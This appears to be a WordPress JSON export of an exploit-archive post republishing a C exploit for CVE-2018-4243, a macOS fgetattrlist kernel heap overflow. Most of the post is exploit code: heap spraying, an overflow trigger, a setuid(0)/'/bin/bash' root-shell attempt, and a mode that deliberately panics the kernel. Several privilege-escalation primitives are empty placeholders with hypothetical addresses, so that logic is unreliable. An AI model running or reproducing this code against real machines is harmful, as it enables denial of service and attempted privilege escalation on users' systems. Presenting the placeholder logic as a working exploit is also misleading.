{"id":37577,"date":"2026-01-27T11:51:06","date_gmt":"2026-01-27T11:51:06","guid":{"rendered":"http:\/\/localhost\/?p=37577"},"modified":"2026-01-27T11:51:06","modified_gmt":"2026-01-27T11:51:06","slug":"macos-10134-17e199-fgetattrlist-heap-overflow","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=37577","title":{"rendered":"\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423"},"content":{"rendered":"

{“lastseen”:”2026-01-27T17:15:26″,”description”:”CVE-2018-4243 is a critical kernel heap overflow vulnerability in macOS and iOS affecting the fgetattrlist system call. The vulnerability allows local attackers to trigger kernel heap corruption, potentially leading to kernel panic, privilege…”,”published”:”2026-01-27T00:00:00″,”modified”:”2026-01-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow”,”source”:””,”references”:””,”id”:”PACKETSTORM:214423″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2018-4243″],”sourceData”:”=============================================================================================================================================\\n | # Title : macOS 10.13.4 (17E199) fgetattrlist Local Privilege Escalation via fgetattrlist heap overflow (XNU kernel) |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/apple.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212496\/ \\u0026 CVE-2018-4243\\n \\n [+] Summary : CVE-2018-4243 is a critical kernel heap overflow vulnerability in macOS and iOS affecting the fgetattrlist system call. \\n The vulnerability allows local attackers to trigger kernel heap corruption, potentially leading to kernel panic, privilege escalation, or arbitrary code execution.\\n [+] POC :\\t\\n \\n \/*\\n * macOS CVE-2018-4243 LPE Exploit\\n * Local Privilege Escalation via fgetattrlist heap overflow\\n * by indoushka\\n *\/\\n \\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003cfcntl.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n #include \\u003csys\/attr.h\\u003e\\n #include \\u003csys\/types.h\\u003e\\n #include \\u003csys\/sysctl.h\\u003e\\n #include \\u003cmach\/mach.h\\u003e\\n #include \\u003cstring.h\\u003e\\n #include \\u003cpthread.h\\u003e\\n #include \\u003cerrno.h\\u003e\\n \\n #define MAX_FDS 1000\\n #define SPRAY_COUNT 50000\\n #define TARGET_SIZE 192 \/\/ Size for controlled heap spraying\\n \\n \/\/ Structure for fake object in kernel\\n typedef struct {\\n uint64_t next;\\n uint64_t prev;\\n uint64_t some_func_ptr;\\n char padding[32];\\n } fake_kobj_t;\\n \\n \/\/ Global variables\\n int g_fds[MAX_FDS];\\n int g_fd_count = 0;\\n pthread_t spray_thread;\\n \\n \/\/ Kernel read primitive (placeholder – needs specific offset)\\n uint64_t kernel_read_primitive(uint64_t addr) {\\n \/\/ This would require specific kernel info leak\\n \/\/ For PoC, we return dummy value\\n return 0;\\n }\\n \\n \/\/ Kernel write primitive via heap overflow\\n void kernel_write_primitive(void* target, void* data, size_t size) {\\n \/\/ This is where the actual overflow happens\\n \/\/ We would craft specific heap layout\\n }\\n \\n \/\/ Spray kernel heap with controlled objects\\n void* heap_spray_thread(void* arg) {\\n printf(\\”[+] Starting heap spray thread\\\\n\\”);\\n \\n char* spray_data = malloc(TARGET_SIZE);\\n if (!spray_data) {\\n printf(\\”[-] Failed to allocate spray data\\\\n\\”);\\n return NULL;\\n }\\n \\n \/\/ Craft fake object with function pointer we want to hijack\\n fake_kobj_t fake_obj = {0};\\n fake_obj.next = 0x4141414141414141;\\n fake_obj.prev = 0x4242424242424242;\\n \/\/ Target: cred structure or file operations pointer\\n \\n for (int i = 0; i \\u003c SPRAY_COUNT; i++) {\\n \/\/ Use sysctl for heap spraying (common technique)\\n char name[32];\\n snprintf(name, sizeof(name), \\”kern.spray.%d\\”, i);\\n \\n int mib[3];\\n size_t mib_len = 3;\\n \\n if (sysctlnametomib(name, mib, \\u0026mib_len) == 0) {\\n sysctl(mib, mib_len, NULL, 0, spray_data, TARGET_SIZE);\\n }\\n \\n if (i % 1000 == 0) {\\n printf(\\”[.] Sprayed %d objects\\\\n\\”, i);\\n }\\n }\\n \\n free(spray_data);\\n return NULL;\\n }\\n \\n \/\/ Trigger the overflow with controlled data\\n int trigger_overflow(int fd, void* overflow_data, size_t data_size) {\\n struct attrlist al = {0};\\n al.bitmapcount = ATTR_BIT_MAP_COUNT;\\n al.volattr = 0xfff;\\n al.commonattr = ATTR_CMN_RETURNED_ATTRS;\\n \\n \/\/ Use small buffer to cause overflow\\n size_t buf_size = 16;\\n \\n \/\/ Prepare buffer with crafted data\\n void* buffer = malloc(buf_size);\\n if (!buffer) return -1;\\n \\n \/\/ Copy overflow payload to beginning of buffer\\n \/\/ Kernel will write 36 bytes from offset 4\\n memcpy(buffer, overflow_data, buf_size);\\n \\n int result = fgetattrlist(fd, \\u0026al, buffer, buf_size, 0);\\n \\n free(buffer);\\n return result;\\n }\\n \\n \/\/ Open multiple file descriptors for heap manipulation\\n void setup_file_descriptors() {\\n printf(\\”[+] Setting up file descriptors for heap feng shui\\\\n\\”);\\n \\n for (int i = 0; i \\u003c MAX_FDS; i++) {\\n g_fds[i] = open(\\”\/\\”, O_RDONLY);\\n if (g_fds[i] \\u003c 0) {\\n g_fd_count = i;\\n break;\\n }\\n }\\n printf(\\”[+] Opened %d file descriptors\\\\n\\”, g_fd_count);\\n }\\n \\n \/\/ Close all file descriptors\\n void cleanup_file_descriptors() {\\n for (int i = 0; i \\u003c g_fd_count; i++) {\\n if (g_fds[i] \\u003e= 0) {\\n close(g_fds[i]);\\n }\\n }\\n }\\n \\n \/\/ Attempt to get root privileges\\n void get_root_shell() {\\n printf(\\”[+] Attempting to get root shell\\\\n\\”);\\n \\n \/\/ Method 1: Direct setuid(0)\\n if (setuid(0) == 0) {\\n printf(\\”[+] Success! Got root via setuid(0)\\\\n\\”);\\n } else {\\n printf(\\”[-] setuid(0) failed: %s\\\\n\\”, strerror(errno));\\n }\\n \\n \/\/ Check current privileges\\n if (getuid() == 0) {\\n printf(\\”[+] WE ARE ROOT! UID: %d\\\\n\\”, getuid());\\n printf(\\”[+] Spawning root shell…\\\\n\\”);\\n \\n \/\/ Launch root shell\\n system(\\”\/bin\/bash\\”);\\n } else {\\n printf(\\”[-] Still not root. UID: %d\\\\n\\”, getuid());\\n printf(\\”[-] Exploit failed or needs more work\\\\n\\”);\\n }\\n }\\n \\n \/\/ Main exploit logic\\n void exploit() {\\n printf(\\”[*] macOS CVE-2018-4243 LPE Exploit\\\\n\\”);\\n printf(\\”[*] Attempting local privilege escalation\\\\n\\\\n\\”);\\n \\n \/\/ Phase 1: Heap grooming\\n printf(\\”[*] Phase 1: Heap grooming\\\\n\\”);\\n setup_file_descriptors();\\n \\n \/\/ Start heap spray thread\\n if (pthread_create(\\u0026spray_thread, NULL, heap_spray_thread, NULL) != 0) {\\n printf(\\”[-] Failed to create spray thread\\\\n\\”);\\n return;\\n }\\n \\n \/\/ Phase 2: Prepare overflow payload\\n printf(\\”\\\\n[*] Phase 2: Preparing overflow payload\\\\n\\”);\\n \\n \/\/ Craft payload to overwrite critical kernel structure\\n \/\/ This would typically target:\\n \/\/ 1. File operation pointers\\n \/\/ 2. Credential structures (cred)\\n \/\/ 3. VTable pointers\\n \\n char payload[192] = {0};\\n \\n \/\/ Example: Try to overwrite a function pointer\\n \/\/ Placeholder for actual exploit payload\\n uint64_t target_addr = 0xffffffff12345678; \/\/ Hypothetical address\\n \\n \/\/ Fill payload with target address at specific offset\\n for (int i = 0; i \\u003c sizeof(payload)\/8; i++) {\\n ((uint64_t*)payload)[i] = target_addr;\\n }\\n \\n \/\/ Phase 3: Trigger overflow\\n printf(\\”\\\\n[*] Phase 3: Triggering controlled overflow\\\\n\\”);\\n \\n \/\/ Use one of our file descriptors\\n if (g_fd_count \\u003e 0) {\\n printf(\\”[+] Triggering overflow on FD %d\\\\n\\”, g_fds[0]);\\n \\n \/\/ Wait for spray thread to set up heap\\n sleep(1);\\n \\n int result = trigger_overflow(g_fds[0], payload, sizeof(payload));\\n printf(\\”[+] Overflow triggered, result: %d\\\\n\\”, result);\\n }\\n \\n \/\/ Wait for spray thread\\n pthread_join(spray_thread, NULL);\\n \\n \/\/ Phase 4: Attempt privilege escalation\\n printf(\\”\\\\n[*] Phase 4: Attempting privilege escalation\\\\n\\”);\\n \\n \/\/ Try multiple escalation techniques\\n \\n \/\/ Technique 1: Direct kernel object manipulation\\n printf(\\”[+] Attempting kernel object corruption\\\\n\\”);\\n \\n \/\/ Technique 2: Try to execute privileged operations\\n printf(\\”[+] Testing current privileges\\\\n\\”);\\n system(\\”id\\”);\\n \\n \/\/ Try to get root\\n get_root_shell();\\n \\n \/\/ Cleanup\\n cleanup_file_descriptors();\\n \\n printf(\\”\\\\n[*] Exploit completed\\\\n\\”);\\n }\\n \\n \/\/ Fallback: Simple panic if LPE fails\\n void panic_if_root_failed() {\\n printf(\\”[*] LPE failed, triggering kernel panic instead\\\\n\\”);\\n \\n int fd = open(\\”\/\\”, O_RDONLY);\\n if (fd \\u003c 0) return;\\n \\n struct attrlist al = {0};\\n al.bitmapcount = ATTR_BIT_MAP_COUNT;\\n al.commonattr = ATTR_CMN_RETURNED_ATTRS;\\n \\n \/\/ Use extremely small buffer to maximize panic chance\\n size_t buf_size = 4;\\n void* buffer = malloc(buf_size);\\n \\n if (buffer) {\\n printf(\\”[!] Triggering kernel panic…\\\\n\\”);\\n fgetattrlist(fd, \\u0026al, buffer, buf_size, 0);\\n free(buffer);\\n }\\n \\n close(fd);\\n }\\n \\n int main(int argc, char** argv) {\\n printf(\\”[*] ========================================\\\\n\\”);\\n printf(\\”[*] macOS CVE-2018-4243 Exploit Suite\\\\n\\”);\\n printf(\\”[*] ========================================\\\\n\\\\n\\”);\\n \\n int choice = 1; \/\/ Default to LPE attempt\\n \\n if (argc \\u003e 1) {\\n choice = atoi(argv[1]);\\n }\\n \\n switch(choice) {\\n case 1:\\n printf(\\”[*] Mode: Local Privilege Escalation Attempt\\\\n\\”);\\n exploit();\\n break;\\n \\n case 2:\\n printf(\\”[*] Mode: Kernel Panic (Proof of Concept)\\\\n\\”);\\n {\\n int fd = open(\\”\/\\”, O_RDONLY);\\n struct attrlist al = {0};\\n al.bitmapcount = ATTR_BIT_MAP_COUNT;\\n al.commonattr = ATTR_CMN_RETURNED_ATTRS;\\n \\n size_t buf_size = 8;\\n void* buf = malloc(buf_size);\\n \\n printf(\\”[!] Triggering panic in 3 seconds…\\\\n\\”);\\n sleep(3);\\n \\n fgetattrlist(fd, \\u0026al, buf, buf_size, 0);\\n free(buf);\\n close(fd);\\n }\\n break;\\n \\n default:\\n printf(\\”[!] Invalid mode\\\\n\\”);\\n printf(\\”[!] Usage: %s [mode]\\\\n\\”, argv[0]);\\n printf(\\”[!] Modes: 1=LPE attempt, 2=Kernel panic\\\\n\\”);\\n break;\\n }\\n \\n return 0;\\n }\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214423″,”cvss”:{“score”:9.3,”severity”:”HIGH”,”vector”:”AV:N\/AC:M\/Au:N\/C:C\/I:C\/A:C”,”version”:”2.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:L\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”baseScore”:7.8,”baseSeverity”:”HIGH”,”attackVector”:”LOCAL”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”REQUIRED”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/packetstorm.news\/files\/id\/214423\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-01-27T17:15:26″,”description”:”CVE-2018-4243 is a critical kernel heap overflow vulnerability in macOS and iOS affecting the fgetattrlist system call. The vulnerability allows local attackers to trigger kernel…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,55,12,15,13,53,7,11,5],"class_list":["post-37577","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=37577\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-01-27T17:15:26″,”description”:”CVE-2018-4243 is a critical kernel heap overflow vulnerability in macOS and iOS affecting the fgetattrlist system call. The vulnerability allows local attackers to trigger kernel...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=37577\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-27T11:51:06+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37577#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37577\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423\",\"datePublished\":\"2026-01-27T11:51:06+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37577\"},\"wordCount\":1613,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37577#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37577\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37577\",\"name\":\"\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-27T11:51:06+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37577#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37577\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37577#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=37577","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423 - zero redgem","og_description":"{“lastseen”:”2026-01-27T17:15:26″,”description”:”CVE-2018-4243 is a critical kernel heap overflow vulnerability in macOS and iOS affecting the fgetattrlist system call. The vulnerability allows local attackers to trigger kernel...","og_url":"https:\/\/zero.redgem.net\/?p=37577","og_site_name":"zero redgem","article_published_time":"2026-01-27T11:51:06+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=37577#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=37577"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423","datePublished":"2026-01-27T11:51:06+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=37577"},"wordCount":1613,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-9.3","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=37577#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=37577","url":"https:\/\/zero.redgem.net\/?p=37577","name":"\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-27T11:51:06+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=37577#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=37577"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=37577#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 macOS 10.13.4 (17E199) fgetattrlist Heap Overflow_PACKETSTORM:214423"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37577","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=37577"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37577\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=37577"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=37577"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=37577"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}